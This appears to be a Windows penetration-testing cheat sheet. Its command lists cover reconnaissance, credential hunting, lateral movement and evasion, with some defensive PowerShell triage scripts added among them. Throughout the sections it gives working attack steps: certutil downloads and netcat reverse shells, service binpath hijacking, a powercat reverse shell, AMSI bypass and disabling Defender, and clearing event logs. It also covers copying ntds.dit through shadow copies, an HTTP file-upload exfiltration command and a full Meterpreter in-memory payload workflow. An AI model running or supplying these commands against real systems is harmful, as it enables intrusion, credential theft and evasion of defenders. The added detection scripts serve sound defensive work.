Windows NT version numbers

NT 3.1   Windows NT 3.1 (All)
NT 3.5   Windows NT 3.5 (All)
NT 3.51  Windows NT 3.51 (All)
NT 4.0   Windows NT 4.0 (All)
NT 5.0   Windows 2000 (All)
NT 5.1   Windows XP (Home, Pro, MC, Tablet PC, Starter, Embedded)
NT 5.2   Windows XP (64-bit, Pro 64-bit), Windows Server 2003 & R2 (Standard, Enterprise), Windows Home Server
NT 6.0   Windows Vista (Starter, Home Basic, Home Premium, Business, Enterprise, Ultimate)
NT 6.1   Windows 7 (Starter, Home, Pro, Enterprise, Ultimate), Windows Server 2008 R2 (Foundation, Standard, Enterprise)
NT 6.2   Windows 8 (x86/64, Pro, Enterprise, Windows RT (ARM)), Windows Phone 8, Windows Server 2012 (Foundation, Essentials, Standard)


Important paths

Usually C:\Windows
DNS entries
Network settings
%SYSTEMROOT%\system32\config\SAM
Usernames and password hashes
Copy of SAM
Backup copy of SAM
Application logs
Security logs
%ALLUSERSPROFILE%\Start Menu\Programs\Startup\
Startup path (all users)
%USERPROFILE%\Start Menu\Programs\Startup\
Startup path (current user)
Prefetch path (EXE execution records)

Startup paths

For WINDOWS NT 6.1, 6.0

# All users
%SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
# Specific users
%SystemDrive%\Users\%UserName%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

For WINDOWS NT 5.2, 5.1, 5.0

# All users
%SystemDrive%\Documents and Settings\All Users\Start Menu\Programs\Startup
# Specific users
%SystemDrive%\Documents and Settings\%UserName%\Start Menu\Programs\Startup

For WINDOWS NT 4.0, 3.51, 3.50

%SystemDrive%\WINNT\Profiles\All Users\Start Menu\Programs\Startup
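Added example (not from the original sheet): a PowerShell script that walks the startup folders listed above on the local host and reports each entry with the program it actually launches, its SHA256 and its Authenticode status, so a responder can compare the result against a known-good baseline instead of eyeballing the folders. It assumes Vista/NT 6.0 or later folder layout, PowerShell 4 or newer (for Get-FileHash) and, to read other users' profiles, an elevated session.

```powershell
# Added triage example (not part of the original cheat sheet).
# Enumerates the NT 6.x startup folders and resolves .lnk shortcuts so the
# hash reported is that of the binary that will run at logon.

$startupFolders = @(
    (Join-Path $env:ProgramData 'Microsoft\Windows\Start Menu\Programs\Startup'),  # all users
    (Join-Path $env:APPDATA     'Microsoft\Windows\Start Menu\Programs\Startup')   # current user
)

# Add every other profile's per-user startup folder that exists on disk.
$usersRoot = Join-Path $env:SystemDrive 'Users'
foreach ($userDir in Get-ChildItem -Path $usersRoot -Directory -ErrorAction SilentlyContinue) {
    $p = Join-Path $userDir.FullName 'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'
    if (Test-Path $p) { $startupFolders += $p }
}

$shell = New-Object -ComObject WScript.Shell   # used only to resolve .lnk targets

$startupFolders | Sort-Object -Unique | ForEach-Object {
    $folder = $_
    if (-not (Test-Path $folder)) { return }
    Get-ChildItem -Path $folder -Force -File -ErrorAction SilentlyContinue | ForEach-Object {
        $target = $_.FullName
        if ($_.Extension -ieq '.lnk') {
            $t = $shell.CreateShortcut($_.FullName).TargetPath
            if ($t -and (Test-Path $t)) { $target = $t }
        }
        [PSCustomObject]@{
            Folder        = $folder
            Entry         = $_.Name
            Target        = $target
            LastWriteTime = $_.LastWriteTime
            SHA256        = (Get-FileHash -Path $target -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
            Signature     = (Get-AuthenticodeSignature -FilePath $target -ErrorAction SilentlyContinue).Status
        }
    }
} | Format-Table -AutoSize
```

Unsigned or recently written entries, and shortcuts whose target lives outside Program Files or the Windows directory, are the ones worth a second look; the hashes can be fed straight into whatever reputation lookup the team uses.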

System information commands

Operating system version
sc query state=all
Show services
tasklist /svc
Show processes and services
tasklist /m
Show all processes and DLLs
tasklist /S ip /v
Processes running on a remote host
taskkill /PID pid /F
Force-kill a process
systeminfo /S ip /U domain\user /P Pwd
Get system information remotely
reg query \\ip\RegDomain\Key /v VALUE
Query the registry remotely (/s = all values)
reg query HKLM /f password /t REG_SZ /s
Search the registry for passwords
reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer
WSUS server address
fsutil fsinfo drives
List of drives (needs admin access)
dir /a /s /b c:\*.pdf
Search for all PDF files
dir /a /b c:\windows\kb*
Search for patches
findstr /si password *.txt *.xml *.xls
Search files for passwords
tree /F /A c: > tree.txt
List of folders on drive C:
reg save HKLM\Security security.hive
Save the Security hive to a file
Current user
whoami /priv
Current user privileges

net / domain commands

net view /domain
Hosts in the current domain
net view /domain:[MYDOMAIN]
Hosts in [MYDOMAIN]
net user /domain
All users of the current domain
net user user pass /add
Add a user
net localgroup "Administrators" user /add
Add a user to Administrators
net accounts /domain
Domain password policy
net localgroup "Administrators"
List of local admins
net group /domain
List of domain groups
net group "Domain Admins" /domain
List of domain admins
net group "Domain Controllers" /domain
List of DCs for the current domain
net share
SMB shares
net session | find / "\\"
List of active SMB sessions
net user user /ACTIVE:yes /domain
Unlock a domain user account
net user user "newpassword" /domain
Change a domain user's password
net share share c:\share
Share a folder

Remote commands

tasklist /S ip /v
Processes running on ip
systeminfo /S ip /U domain\user /P Pwd
System information for ip
net share \\ip
Shares on ip
net use \\ip
Connect to the file system of ip
net use z: \\ip\share password /user:DOMAIN\user
Map a drive with the specified credentials
reg add \\ip\regkey\value
Add a registry key on ip
sc \\ip create service binpath=C:\Windows\System32\x.exe start= auto
Create a remote service (note the space after start=)
cmd.exe /c certutil -urlcache -split -f http://ip/nc.exe c:\windows\temp\nc.exe
Copy a file from ip to the current system via cmd.exe
cmd.exe /c c:\windows\temp\nc.exe ip port -e cmd.exe
Reverse shell
nc.exe -lvvp port
Listen on a specific port
python3 -m http.server port
Start a web server
xcopy /s \\ip\dir C:\local
Copy a folder from ip
shutdown /m \\ip /r /t 0 /f
Restart ip

Network commands

ipconfig /all
IP settings
ipconfig /displaydns
DNS cache
netstat -ana
Show connections
netstat -anop tcp 1
Netstat loop (refresh every second)
netstat -an | findstr LISTENING
Ports in use
route print
Routing table
arp -a
MAC addresses of known hosts (from the ARP table)
nslookup, set type=any, ls -d domain > results.txt, exit
Attempt a DNS zone transfer
nslookup -type=SRV
Look up domain SRV records (ldap, kerberos, sip)
tftp -I ip GET remotefile
File transfer via TFTP
netsh wlan show profiles
Saved wireless network profiles
netsh firewall set opmode disable
Disable the firewall (old syntax)
netsh wlan export profile folder=. key=clear
Export wifi profiles with keys in plaintext
netsh interface ip show interfaces
List interface IDs/MTUs
netsh interface ip set address local static ip nmask gw ID
Set a static IP
netsh interface ip set dns local static ip
Set the DNS server
netsh interface ip set address local dhcp
Set the interface to use DHCP

Utility commands

type file
Show file contents
del path\*.* /a /s /q /f
Delete files in the given path
find /I "str" filename
Find a string in a file
command | find /c /v ""
Count lines of command output
at HH:MM file [args] (e.g. at 14:45 cmd /c)
Schedule file execution
runas /user:user "file [args]"
Execute a file as a specific user
shutdown /r /t 0
Restart immediately
sc stop UsoSvc
Stop the UsoSvc service
sc start UsoSvc
Start the UsoSvc service
sc config UsoSvc binpath="c:\windows\temp\nc.exe ip port -e C:\windows\system32\cmd.exe"
Change the executable path of UsoSvc
tr -d '\15\32' < win.txt > unix.txt
Delete CR & ^Z ('nix)
makecab file
wusa.exe /uninstall /kb:###
Uninstall a patch
cmd.exe "wevtutil qe Application /c:40 /f:text /rd:true"
Query the event log from the CLI
Using Local user manager
Using Services control panel
Using Task manager
Using Security policy manager
Using Event viewer

Misc. commands

Lock the workstation

rundll32.exe user32.dll,LockWorkStation

Disable Windows Firewall

netsh advfirewall set currentprofile state off
netsh advfirewall set allprofiles state off

Create a port forward (needs admin access)

netsh interface portproxy add v4tov4 listenport=3000 listenaddress=1.1.1.1 connectport=4000 connectaddress=
netsh interface portproxy delete v4tov4 listenport=3000 listenaddress=1.1.1.1

Enable cmd

reg add HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 0 /f

PSEXEC commands

Remote file execution with specific credentials

psexec /accepteula \\targetIP -u domain\user -p password -c -f \\smbIP\share\file.exe

Execute a command with a specific hash

psexec /accepteula \\ip -u Domain\user -p Lt1 c:\Program-1

Run a command on the remote system as SYSTEM

psexec /accepteula \\ip -s cmd.exe

Terminal services (RDP)

Start RDP

Create regfile.reg with the following lines in it:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
reg import regfile.reg
net start "termservice"
sc config termservice start= auto
net start termservice
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Move RDP to port 443 (the terminal service must be restarted)

REG ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 443 /f

Disable Network Level Authentication and allow Remote Desktop through the firewall

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d "0" /f
netsh firewall set service type = remotedesktop mode = enable

Import a task from an XML file

schtasks.exe /create /tn MyTask /xml "C:\MyTask.xml" /f

WMIC commands

wmic [alias] get /?
List of all attributes
wmic [alias] call /?
Callable methods
wmic process list full
Process properties
wmic startup list full
Startup items
wmic ntdomain list
Domain and DC information
wmic qfe
List of all patches
wmic process call create "process_name"
Run a process
wmic process where name="process" call terminate
Terminate a process
wmic logicaldisk get description,name
Show logical disks
wmic cpu get DataWidth /format:list
Show whether the system is 32-bit or 64-bit
wmic service where started=true get name, startname
Show running services

WMIC [alias] [where] [clause]

[alias] == process, share, startup, service, nicconfig, useraccount, etc.
[where] == where (name="cmd.exe"), where (parentprocessid!=[pid]), etc.
[clause] == list [full|brief], get [attrib1, attrib2], call [method], delete

Run a file from an SMB share with specific credentials

wmic /node:targetIP /user:domain\user /password:password process call create "\\smbIP\share\evil.exe"

Uninstall software

wmic product get name /value # Get software names
wmic product where name="XXX" call uninstall /nointeractive

Logged-on user of a remote host

wmic /node:remotecomputer computersystem get username

Show processes in real time

wmic /node:machinename process list brief /every:1

Enable RDP

wmic /node:"machinename" path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"

Number of logons for users matching "adm"

wmic netlogin where (name like "%adm%") get numberoflogons

Search services for unquoted paths

wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\windows\\" | findstr /i /v """
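Added example (not from the original sheet): a PowerShell audit that finds the same class of service as the findstr pipeline above, an auto-start service whose ImagePath is unquoted and contains a space, and prints the sc.exe command that would quote it. It uses Get-CimInstance Win32_Service, so it needs PowerShell 3 or later; it is read-only, and the suggested fix is printed rather than applied because correcting binPath is a change-controlled action.

```powershell
# Added hardening audit (not part of the original cheat sheet).
# An unquoted path such as C:\Program Files\Vendor\svc.exe is resolved by the
# service controller by trying C:\Program.exe first, so each such service is
# a candidate for the fix printed in the Suggested column.

$services = Get-CimInstance -ClassName Win32_Service

$findings = foreach ($svc in $services) {
    $path = $svc.PathName
    if (-not $path) { continue }
    if ($path -match '^"') { continue }                      # already quoted
    if ($path -match '^[A-Za-z]:\\Windows\\') { continue }   # system directory, as the findstr line skips it

    # Split at the first ".exe" (case-insensitive) into executable and arguments.
    $m = [regex]::Match($path, '(?i)^(.*?\.exe)(.*)$')
    if (-not $m.Success) { continue }
    $exe  = $m.Groups[1].Value
    $args = $m.Groups[2].Value
    if ($exe -notmatch ' ') { continue }                     # no space, nothing to exploit

    # The quotes inside binPath= must reach sc.exe literally, hence the escaping.
    $fix = 'sc config ' + $svc.Name + ' binPath= "\"' + $exe + '\"' + $args + '"'

    [PSCustomObject]@{
        Name      = $svc.Name
        StartMode = $svc.StartMode
        RunsAs    = $svc.StartName
        PathName  = $path
        Suggested = $fix
    }
}

if ($findings) {
    $findings | Sort-Object StartMode, Name | Format-List
} else {
    Write-Host 'No auto-start services with unquoted, space-containing paths found.'
}
```

Services that start automatically and run as LocalSystem are the ones to fix first; whether a path is actually abusable also depends on whether non-administrators can write to the intermediate directories, which is a separate ACL check.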

Copy of the Volume Shadow

1. wmic /node:DC IP /user:"DOMAIN\user" /password:"PASS" process call create "cmd /c vssadmin list shadows 2>&1 > C:\temp\output.txt"
# If any copies already exist then exfil, otherwise create using the
# following commands. Check output.txt for any errors
2. wmic /node:DC IP /user:"DOMAIN\user" /password:"PASS" process call create "cmd /c vssadmin create shadow /for=C: 2>&1 > C:\temp\output.txt"
3. wmic /node:DC IP /user:"DOMAIN\user" /password:"PASS" process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\system.hive 2>&1 > C:\temp\output.txt"
4. wmic /node:DC IP /user:"DOMAIN\user" /password:"PASS" process call create "cmd /c copy C:\temp\ntds.dit 2>&1 > C:\temp\output.txt"
Step-by-step instructions for step 5 below
5. From Linux, download and run ntdsxtract and libesedb to export hashes or other domain information
a. Additional instructions found under the VSSOWN section
b. ntdsxtract -
c. libesedb -

PowerShell environment

Stop recording
get-content file
Display the contents of a file
get-help command -examples
Display command examples
get-command *string*
Search for a cmdlet
Show services (stop-service, start-service)
get-wmiobject -class win32_service
Show services with their identity information
Show PowerShell version
powershell.exe -version 2.0
Run PowerShell 2.0 from version 3.0
get-service | measure-object
Number of objects returned
List PSDrives
get-process | select -expandproperty name
Show process names
get-help * -parameter credential
Cmdlets that accept credentials
get-wmiobject -list *network*
Available network-related WMI classes
[Net.DNS]::GetHostEntry("ip")
DNS lookup
powershell.exe wget "" -outfile "c:\temp\nc.exe"
Download and save a file
powershell.exe -c "IEX (New-Object System.Net.WebClient).DownloadString(''); powercat -c -p 4444 -e cmd"
Reverse shell with powercat
Web server on port 8050
Use mimikatz
Call ps1 files
Import-Module .\Invoke-Mimikatz.ps1
Download and save a file: iwr -uri -o file.exe

Bypass AMSI

Import-Module .\Invoke-Obfuscation\Invoke-Obfuscation.psm1
Out-ObfuscatedTokenCommand -Path .\powerview.ps1 | Out-File out
. .\AMSI-Bypass.ps1

Disable real-time monitoring

powershell -command Set-MpPreference -DisableRealtimeMonitoring $true

List of all users

$users = New-Object DirectoryServices.DirectorySearcher
$users.Filter = "(&(objectclass=user))"
$users.SearchRoot = ''
$users.FindAll()

List of all computers

$computers = New-Object DirectoryServices.DirectorySearcher
$computers.Filter = "(&(objectclass=computer))"
$computers.SearchRoot = ''
$computers.FindAll()

Turn off Kerberos pre-authentication for an account (doesnotrequirepreauth)

Set-ADAccountControl -Identity jorden -DoesNotRequirePreAuth $true
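Added example (not the original sheet's code): the defender's counterpart to the Set-ADAccountControl line above. It lists every account whose pre-authentication flag has been cleared, with the context an analyst needs to decide whether the setting is legitimate (enabled, last logon, group membership), and can switch the flag back on. It assumes the ActiveDirectory RSAT module is installed and the caller has rights to read and, for -Remediate, modify the accounts.

```powershell
# Added AD hygiene check (not part of the original cheat sheet).
# Usage:  .\Find-NoPreAuth.ps1            # report only
#         .\Find-NoPreAuth.ps1 -Remediate # also re-enable pre-authentication
param([switch]$Remediate)

Import-Module ActiveDirectory

# DoesNotRequirePreAuth is the UF_DONT_REQUIRE_PREAUTH bit of userAccountControl.
$exposed = Get-ADUser -Filter 'DoesNotRequirePreAuth -eq $true' `
    -Properties DoesNotRequirePreAuth, Enabled, LastLogonDate, MemberOf, whenChanged

if (-not $exposed) {
    Write-Host 'No accounts with pre-authentication disabled.'
    return
}

$exposed | Select-Object SamAccountName, Enabled, LastLogonDate, whenChanged,
    @{ Name = 'Groups'; Expression = {
        # Reduce each group DN to its CN for a compact listing.
        ($_.MemberOf | ForEach-Object { (($_ -split ',')[0]) -replace '^CN=' }) -join ';'
    }} |
    Sort-Object Enabled -Descending | Format-Table -AutoSize

if ($Remediate) {
    foreach ($u in $exposed) {
        Set-ADAccountControl -Identity $u -DoesNotRequirePreAuth $false
        Write-Host "Re-enabled Kerberos pre-authentication for $($u.SamAccountName)"
    }
}
```

The whenChanged timestamp helps correlate a recently flipped flag with the Security log on the domain controller (event 4738, "A user account was changed"), which records who made the modification.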

Clear the Application and Security event logs (on SVR01)

Get-EventLog -List
Clear-EventLog -LogName Application, Security -ComputerName SVR01
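Added example (not from the original sheet): what the Clear-EventLog command above leaves behind, and how to find it. Windows writes Security event 1102 ("The audit log was cleared") and System event 104 ("The <log> log file was cleared") even though the logs themselves are gone, and both carry the account that did it. The script assumes PowerShell 3 or later (Get-WinEvent with -FilterHashtable) and administrative rights, which are required to read the Security log.

```powershell
# Added detection example (not part of the original cheat sheet).
# Usage:  .\Find-LogClears.ps1 -ComputerName SVR01 -Days 30
param(
    [string]$ComputerName = $env:COMPUTERNAME,
    [int]$Days = 30
)

$since = (Get-Date).AddDays(-$Days)

# Security 1102 covers the Security log; System 104 covers every other log
# (Application, System, PowerShell, ...), naming the cleared log in <Channel>.
$queries = @(
    @{ LogName = 'Security'; Id = 1102; StartTime = $since },
    @{ LogName = 'System';   Id = 104;  StartTime = $since }
)

$hits = foreach ($q in $queries) {
    # Get-WinEvent raises a non-terminating error when nothing matches; that is the normal case.
    Get-WinEvent -ComputerName $ComputerName -FilterHashtable $q -ErrorAction SilentlyContinue
}

$hits | Where-Object { $_ } | Sort-Object TimeCreated | ForEach-Object {
    # Both events place the actor in <UserData><LogFileCleared>.
    $data = ([xml]$_.ToXml()).Event.UserData.LogFileCleared
    [PSCustomObject]@{
        Time       = $_.TimeCreated
        Computer   = $_.MachineName
        EventId    = $_.Id
        ClearedLog = if ($data.Channel) { $data.Channel } else { $_.LogName }
        ClearedBy  = "$($data.SubjectDomainName)\$($data.SubjectUserName)"
    }
} | Format-Table -AutoSize
```

If the logs are forwarded to a collector, run the same query against the forwarded-events channel there; a clear on the endpoint cannot remove copies that already left it.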

Export operating system details to a CSV file

Get-WmiObject -Class win32_operatingsystem | select -Property * | export-csv c:\os.txt

List of running services

Get-Service | Where-Object {$_.Status -eq "Running"}

Use a PSDrive for a persistent share mapping

New-PSDrive -Persist -PSProvider FileSystem -Root \\ip\tools -Name i

Files written after 8/20

Get-ChildItem -Path c:\ -Force -Recurse -Filter *.log -ErrorAction SilentlyContinue | Where-Object {$_.LastWriteTime -gt "2012-08-20"}

Get file from http


TCP port connection scanner

$ports=(#,#,#);$ip="x.x.x.x";foreach ($port in $ports) {try {$socket=New-Object System.Net.Sockets.TCPClient($ip,$port);}catch{};
if ($socket -eq $NULL) {echo $ip":"$port" - Closed";}
else {echo $ip":"$port" - Open";$socket=$NULL;}}

Ping command with 500 millisecond timeout

$ping = New-Object

Basic authentication prompt

powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass
$Host.UI.PromptForCredential("title","message","user","domain")

Run an exe (from cmd.exe) every 4 hours between August 8-11, 2013, from 0800 to 1700

powershell.exe -Command "do {if ((Get-Date -format yyyyMMdd-HHmm) -match '201308(0[8-9]|1[0-1])-(0[8-9]|1[0-7])[0-5][0-9]') {Start-Process -WindowStyle Hidden "C:\Temp\my.exe";Start-Sleep -s 14400}}while(1)"

Run PowerShell as another user

$pw = ConvertTo-SecureString -String "PASSWORD" -AsPlainText -Force;
$pp = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "DOMAIN\user", $pw;
Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command &{Start-Process file.exe -verb runas}'

Download with PowerShell (iwr)

powershell iwr -usebasicparsing http://192.168.2.x/SharpHound.exe -OutFile SharpHound.exe

Send email

powershell.exe Send-MailMessage -To "email" -From "email" -Subject "Subject" -a "attachment file path" -Body "Body" -SmtpServer <target email server IP>

Enable remote PowerShell access (requires credentials)

net time \\ip
at \\ip time "Powershell -Command 'Enable-PSRemoting -Force'"
at \\ip time+1 "Powershell -Command 'Set-Item wsman:\localhost\client\trustedhosts ''"
at \\ip time+2 "Powershell -Command 'Restart-Service WinRM'"
Enter-PSSession -ComputerName ip -Credential username

Hostname and IP list for all domains (from the DNS server)

Get-WmiObject -ComputerName DC -Namespace root\microsoftDNS -Class MicrosoftDNS_ResourceRecord -Filter "domainname='DOMAIN'" | select

Download a file with PowerShell from a specific path

powershell.exe -noprofile -noninteractive -command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; $source="""https://YOUR_SPECIFIED_IP/"""; $destination="C:\"; $http = new-object System.Net.WebClient; $response = $http.DownloadFile($source, $destination);"

Upload a file with PowerShell

The script sends a file ($filepath) over HTTP to a server ($server) via a POST request.
A web server must be listening on the port designated in $server.
powershell.exe -noprofile -noninteractive -command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; $server="""http://YOUR_SPECIFIED_IP/folder"""; $filepath="C:\"; $http = new-object System.Net.WebClient; $response = $http.UploadFile($server,$filepath);"

Using PowerShell to run Meterpreter from memory

Needs Metasploit v4.5+ (msfvenom supports PowerShell)
Use PowerShell (x86) with 32-bit Meterpreter payloads
The encodeMeterpreter.ps1 script is listed below

On the attacking system

1. ./msfvenom -p windows/meterpreter/reverse_https -f psh -a x86 LHOST= LPORT=443 > audit.ps1
2. Move audit.ps1 into the same folder as encodeMeterpreter.ps1
3. Launch PowerShell (x86)
4. powershell.exe -executionpolicy bypass encodeMeterpreter.ps1
5. Copy the encoded Meterpreter string

Start the listener on the attacking system

1. ./msfconsole
2. use exploit/multi/handler
3. set payload windows/meterpreter/reverse_https
4. set LHOST 1.1.1.1
5. set LPORT 443
6. exploit -j

On the target system (run powershell (x86))

1. powershell.exe -noexit -encodedCommand <paste encoded Meterpreter string here>

encodeMeterpreter.ps1 [7]

# Get contents of script
$contents = Get-Content audit.ps1
# Compress script
$ms = New-Object IO.MemoryStream
$action = [IO.Compression.CompressionMode]::Compress
$cs = New-Object IO.Compression.DeflateStream ($ms,$action)
$sw = New-Object IO.StreamWriter ($cs, [Text.Encoding]::ASCII)
$contents | ForEach-Object {$sw.WriteLine($_)}
# Close the writer so the deflate stream flushes into $ms
$sw.Close()
# Base64 encode stream
$code = [Convert]::ToBase64String($ms.ToArray())
$command = "Invoke-Expression `$(New-Object IO.StreamReader(`$(New-Object IO.Compression.DeflateStream(`$(New-Object IO.MemoryStream(,`$([Convert]::FromBase64String('$code')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"
# Invoke-Expression $command
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
# Write to standard out
Write-Host $encodedCommand
Copyright 2012 TrustedSec, LLC. All rights reserved. Please see reference [7] for disclaimer

Using PowerShell to start Meterpreter (second method)

On the BT attack box

1. msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=8080 R | msfencode -t psh -a x86

On the attacking system

1. c:\powershell
3. PS c:\ $u = [System.Text.Encoding]::Unicode.GetBytes($cmd)
4. PS c:\ $e = [Convert]::ToBase64String($u)
5. PS c:\ $e
6. Copy contents of $e

Start the listener on the attacking system

1. ./msfconsole
2. use exploit/multi/handler
3. set payload windows/meterpreter/reverse_tcp
4. set LHOST
5. set LPORT 8080
6. exploit -j

On the target system (1: download the shellcode, 2: execute)

1. c:\ powershell -noprofile -noninteractive -command "& {$client = New-Object System.Net.WebClient; $client.DownloadFile('', 'c:\windows\temp\shell.txt')}"
2. c:\ powershell -noprofile -noninteractive -noexit -command "& {$cmd = type 'c:\windows\temp\shell.txt'; powershell -noprofile -noninteractive -noexit -encodedCommand $cmd}"

Identify local privilege-escalation misconfigurations with PowerUp
. .\PowerUp.ps1

Windows registry

Operating system information

HKLM\Software\Microsoft\Windows NT\CurrentVersion

Product name

HKLM\Software\Microsoft\Windows NT\CurrentVersion /v

Installation date

HKLM\Software\Microsoft\Windows NT\CurrentVersion /v InstallDate

Registered owner

HKLM\Software\Microsoft\Windows NT\CurrentVersion /v RegisteredOwner

System root

HKLM\Software\Microsoft\Windows NT\CurrentVersion /v SystemRoot

Time zone information (in minutes from UTC)

HKLM\System\CurrentControlSet\Control\TimeZoneInformation /v ActiveTimeBias

Mapped network drives

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Map Network Drive

Mounted devices


USB devices


Enable IP forwarding

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters - IPEnableRouter = 1

Password keys: LSA secrets can contain VPN, autologon and other passwords

HKEY_LOCAL_MACHINE\Security\Policy\Secrets
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\autoadminlogon

Audit policy information


Kernel and user services

HKLM\System\CurrentControlSet\Services

Software installed on the system


Software installed for the user


Recent documents


User's last visited locations

dtmu & \Opensavetmu

Typed URLs

HKCU\Software\Microsoft\Internet Explorer\TypedURLs
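Added example (not from the original sheet): a PowerShell triage script that reads the registry locations listed in this section from the live system and flags the two that change the host's risk, IP forwarding and an autologon with a stored DefaultPassword. It assumes PowerShell 5.1 (for [DateTimeOffset]::FromUnixTimeSeconds), that AutoAdminLogon and DefaultPassword live under the HKLM Winlogon key (the location Windows actually uses for autologon), and that it is run in the examined user's session for the HKCU values. The Map Network Drive MRU key name is the full name of the key abbreviated above.

```powershell
# Added registry triage example (not part of the original cheat sheet).
# Reports only the presence of DefaultPassword, never its value.

function Get-RegValue([string]$Path, [string]$Name) {
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name } catch { $null }
}

$cv  = 'HKLM:\Software\Microsoft\Windows NT\CurrentVersion'
$tz  = 'HKLM:\System\CurrentControlSet\Control\TimeZoneInformation'
$tcp = 'HKLM:\System\CurrentControlSet\Services\Tcpip\Parameters'
$wl  = 'HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon'   # assumption: HKLM, not HKCU

$installEpoch = Get-RegValue $cv 'InstallDate'   # REG_DWORD, seconds since 1970-01-01 UTC

$report = [ordered]@{
    ProductName            = Get-RegValue $cv 'ProductName'
    InstallDateUtc         = if ($installEpoch) { [DateTimeOffset]::FromUnixTimeSeconds([long]$installEpoch).UtcDateTime } else { $null }
    RegisteredOwner        = Get-RegValue $cv 'RegisteredOwner'
    SystemRoot             = Get-RegValue $cv 'SystemRoot'
    ActiveTimeBiasMinutes  = Get-RegValue $tz 'ActiveTimeBias'        # minutes to add to local time to get UTC
    IPEnableRouter         = Get-RegValue $tcp 'IPEnableRouter'
    AutoAdminLogon         = Get-RegValue $wl 'AutoAdminLogon'
    DefaultUserName        = Get-RegValue $wl 'DefaultUserName'
    DefaultPasswordPresent = [bool](Get-RegValue $wl 'DefaultPassword')
}
[PSCustomObject]$report | Format-List

# Findings worth escalating
if ($report.IPEnableRouter -eq 1) {
    Write-Warning 'IPEnableRouter=1: this host forwards packets between its interfaces.'
}
if ($report.AutoAdminLogon -eq '1' -and $report.DefaultPasswordPresent) {
    Write-Warning "Autologon for '$($report.DefaultUserName)' with a cleartext DefaultPassword in Winlogon."
}

# Per-user artifacts from this section (current user's hive)
Write-Host "`nTyped URLs:"
Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Internet Explorer\TypedURLs' -ErrorAction SilentlyContinue |
    Select-Object -Property url* | Format-List

Write-Host 'Mapped network drive history:'
Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Map Network Drive MRU' -ErrorAction SilentlyContinue |
    Select-Object -Property * -ExcludeProperty PS* | Format-List
```

ActiveTimeBias is needed before interpreting any local timestamps collected from the same host; the InstallDate conversion shows how the epoch value is turned into a UTC time the rest of a timeline can use.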

MRU lists